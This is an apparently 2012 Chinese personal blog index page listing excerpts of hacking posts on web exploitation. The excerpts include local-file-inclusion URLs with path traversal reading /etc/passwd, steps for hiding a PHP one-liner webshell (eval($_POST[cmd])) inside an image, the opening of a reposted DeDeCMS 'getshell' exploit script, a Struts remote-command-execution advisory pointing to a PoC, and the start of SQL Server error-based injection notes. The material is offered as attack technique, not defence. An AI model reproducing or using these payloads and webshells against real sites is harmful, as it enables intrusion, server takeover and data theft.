显示下一条  |  关闭

Faust的博客

倾世元禳

 
 
 
 
 
 

文件包含与注入利用总结

2012-1-21 0:49:50 阅读7 评论0 212012/01 Jan21

1、文件包含利用

通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.

Type of call:
require($file);

Exploit:

http://www.2cto.com/ ?file=/etc/passwd

Type of call:
require(“includes/”.$file);

Exploit:

http://www.2cto.com/ ?file=../../../../../etc/passwd

Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);

作者  | 2012-1-21 0:49:50 | 阅读(7) |评论(0) | 阅读全文>>

IIS7.0畸形解析0day

2012-1-20 16:03:03 阅读12 评论0 202012/01 Jan20

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,

图片随便找一张.

【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到

edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】

一句话:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

然后找个nginx的站,先注册一个用户然后在

作者  | 2012-1-20 16:03:03 | 阅读(12) |评论(0) | 阅读全文>>

【转】DeDeCMS(织梦)变量覆盖0day getshell

2012-1-10 14:42:36 阅读17 评论0 102012/01 Jan10

转载自 顶级葙守
最终编辑 顶级葙守

#!usr/bin/php -w

<?php

error_reporting(E_ERROR);

set_time_limit(0);

print_r(′

DEDEcms Variable Coverage

Exploit Author: www.heixiaozi.com www.webvul.com

);

echo "\r\n";

if($argv[2]==null){

print_r(′

+---------------------------------------------------------------------------+

Usage: php ′.$argv[0].′ url aid path

aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/

作者  | 2012-1-10 14:42:36 | 阅读(17) |评论(0) | 阅读全文>>

【转】Apache Struts远程命令执行和任意文件覆盖漏洞

2012-1-10 14:42:08 阅读8 评论0 102012/01 Jan10

转载自 顶级葙守
最终编辑 顶级葙守

发布日期:2012年01月08日

受影响的软件及系统

Apache Struts 2.3.1及以下版本

漏洞描述


Apache Struts是一款开发Java Web应用程序的开源Web应用框架。
Apache Struts在实现上存在远程命令执行和任意文件覆盖漏洞,成功利用后会允许攻击者覆盖受影响计算机上的任意文件并以当前用户权限执行任意命令。

漏洞检测方法

检查Apache Struts的版本,若 <=2.3.1,则受该漏洞影响。



漏洞证明:
   

POC:http://www.1337day.com/exploits/17347

建议修补方案

   对于Apache

作者  | 2012-1-10 14:42:08 | 阅读(8) |评论(0) | 阅读全文>>

Sql Server 手工注入总结(显错模式)

2012-1-6 9:49:16 阅读14 评论0 62012/01 Jan6

转自:http://t00ls.net/viewthread.php?tid=20248&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

--显错模式总结,利用类型转换报错。 --1=convert(int,(@@version)) --1=convert(int

作者  | 2012-1-6 9:49:16 | 阅读(14) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 
 
 
 

 其他 双子座

 发消息  写留言

 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

日历

 
 
模块内容加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2012

   
创建博客 登录  
 关注